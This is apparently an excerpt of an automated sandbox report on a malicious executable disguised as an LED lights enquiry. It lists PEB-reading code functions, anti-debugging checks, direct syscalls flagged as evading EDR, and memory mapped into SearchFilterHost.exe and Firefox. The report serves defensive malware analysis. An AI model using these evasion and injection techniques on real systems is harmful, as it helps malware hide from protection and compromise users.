            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18BF0 mov eax, dword ptr fs:[00000030h]3_2_02F18BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F18BF0 mov eax, dword ptr fs:[00000030h]3_2_02F18BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9CBF0 mov eax, dword ptr fs:[00000030h]3_2_02F9CBF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EBFC mov eax, dword ptr fs:[00000030h]3_2_02F3EBFC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBEBD0 mov eax, dword ptr fs:[00000030h]3_2_02FBEBD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30BCB mov eax, dword ptr fs:[00000030h]3_2_02F30BCB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30BCB mov eax, dword ptr fs:[00000030h]3_2_02F30BCB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30BCB mov eax, dword ptr fs:[00000030h]3_2_02F30BCB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10BCD mov eax, dword ptr fs:[00000030h]3_2_02F10BCD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10BCD mov eax, dword ptr fs:[00000030h]3_2_02F10BCD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10BCD mov eax, dword ptr fs:[00000030h]3_2_02F10BCD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20BBE mov eax, dword ptr fs:[00000030h]3_2_02F20BBE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20BBE mov eax, dword ptr fs:[00000030h]3_2_02F20BBE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4BB0 mov eax, dword ptr fs:[00000030h]3_2_02FC4BB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4BB0 mov eax, dword ptr fs:[00000030h]3_2_02FC4BB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0CB7E mov eax, dword ptr fs:[00000030h]3_2_02F0CB7E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBEB50 mov eax, dword ptr fs:[00000030h]3_2_02FBEB50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4B4B mov eax, dword ptr fs:[00000030h]3_2_02FC4B4B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4B4B mov eax, dword ptr fs:[00000030h]3_2_02FC4B4B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB8B42 mov eax, dword ptr fs:[00000030h]3_2_02FB8B42
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6B40 mov eax, dword ptr fs:[00000030h]3_2_02FA6B40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6B40 mov eax, dword ptr fs:[00000030h]3_2_02FA6B40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDAB40 mov eax, dword ptr fs:[00000030h]3_2_02FDAB40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EB20 mov eax, dword ptr fs:[00000030h]3_2_02F3EB20
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EB20 mov eax, dword ptr fs:[00000030h]3_2_02F3EB20
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD8B28 mov eax, dword ptr fs:[00000030h]3_2_02FD8B28
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD8B28 mov eax, dword ptr fs:[00000030h]3_2_02FD8B28
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C8F9 mov eax, dword ptr fs:[00000030h]3_2_02F4C8F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C8F9 mov eax, dword ptr fs:[00000030h]3_2_02F4C8F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDA8E4 mov eax, dword ptr fs:[00000030h]3_2_02FDA8E4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E8C0 mov eax, dword ptr fs:[00000030h]3_2_02F3E8C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C89D mov eax, dword ptr fs:[00000030h]3_2_02F9C89D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10887 mov eax, dword ptr fs:[00000030h]3_2_02F10887
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6870 mov eax, dword ptr fs:[00000030h]3_2_02FA6870
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6870 mov eax, dword ptr fs:[00000030h]3_2_02FA6870
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E872 mov eax, dword ptr fs:[00000030h]3_2_02F9E872
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E872 mov eax, dword ptr fs:[00000030h]3_2_02F9E872
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F40854 mov eax, dword ptr fs:[00000030h]3_2_02F40854
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14859 mov eax, dword ptr fs:[00000030h]3_2_02F14859
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14859 mov eax, dword ptr fs:[00000030h]3_2_02F14859
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F22840 mov ecx, dword ptr fs:[00000030h]3_2_02F22840
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB483A mov eax, dword ptr fs:[00000030h]3_2_02FB483A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB483A mov eax, dword ptr fs:[00000030h]3_2_02FB483A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A830 mov eax, dword ptr fs:[00000030h]3_2_02F4A830
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov ecx, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C810 mov eax, dword ptr fs:[00000030h]3_2_02F9C810
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F429F9 mov eax, dword ptr fs:[00000030h]3_2_02F429F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F429F9 mov eax, dword ptr fs:[00000030h]3_2_02F429F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E9E0 mov eax, dword ptr fs:[00000030h]3_2_02F9E9E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F449D0 mov eax, dword ptr fs:[00000030h]3_2_02F449D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDA9D3 mov eax, dword ptr fs:[00000030h]3_2_02FDA9D3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA69C0 mov eax, dword ptr fs:[00000030h]3_2_02FA69C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F989B3 mov esi, dword ptr fs:[00000030h]3_2_02F989B3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F989B3 mov eax, dword ptr fs:[00000030h]3_2_02F989B3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F989B3 mov eax, dword ptr fs:[00000030h]3_2_02F989B3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F109AD mov eax, dword ptr fs:[00000030h]3_2_02F109AD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F109AD mov eax, dword ptr fs:[00000030h]3_2_02F109AD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB4978 mov eax, dword ptr fs:[00000030h]3_2_02FB4978
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB4978 mov eax, dword ptr fs:[00000030h]3_2_02FB4978
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C97C mov eax, dword ptr fs:[00000030h]3_2_02F9C97C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F36962 mov eax, dword ptr fs:[00000030h]3_2_02F36962
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F36962 mov eax, dword ptr fs:[00000030h]3_2_02F36962
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F36962 mov eax, dword ptr fs:[00000030h]3_2_02F36962
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E mov eax, dword ptr fs:[00000030h]3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E mov edx, dword ptr fs:[00000030h]3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E mov eax, dword ptr fs:[00000030h]3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90946 mov eax, dword ptr fs:[00000030h]3_2_02F90946
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA892B mov eax, dword ptr fs:[00000030h]3_2_02FA892B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9892A mov eax, dword ptr fs:[00000030h]3_2_02F9892A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08918 mov eax, dword ptr fs:[00000030h]3_2_02F08918
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08918 mov eax, dword ptr fs:[00000030h]3_2_02F08918
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C912 mov eax, dword ptr fs:[00000030h]3_2_02F9C912
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E908 mov eax, dword ptr fs:[00000030h]3_2_02F8E908
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E908 mov eax, dword ptr fs:[00000030h]3_2_02F8E908
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48EF5 mov eax, dword ptr fs:[00000030h]3_2_02F48EF5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16EE0 mov eax, dword ptr fs:[00000030h]3_2_02F16EE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16EE0 mov eax, dword ptr fs:[00000030h]3_2_02F16EE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16EE0 mov eax, dword ptr fs:[00000030h]3_2_02F16EE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16EE0 mov eax, dword ptr fs:[00000030h]3_2_02F16EE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC6ED0 mov ecx, dword ptr fs:[00000030h]3_2_02FC6ED0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FAAEB0 mov eax, dword ptr fs:[00000030h]3_2_02FAAEB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FAAEB0 mov eax, dword ptr fs:[00000030h]3_2_02FAAEB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9CEA0 mov eax, dword ptr fs:[00000030h]3_2_02F9CEA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00446B64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00446B64
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0044860B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044860B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: NULL target: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchFilterHost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
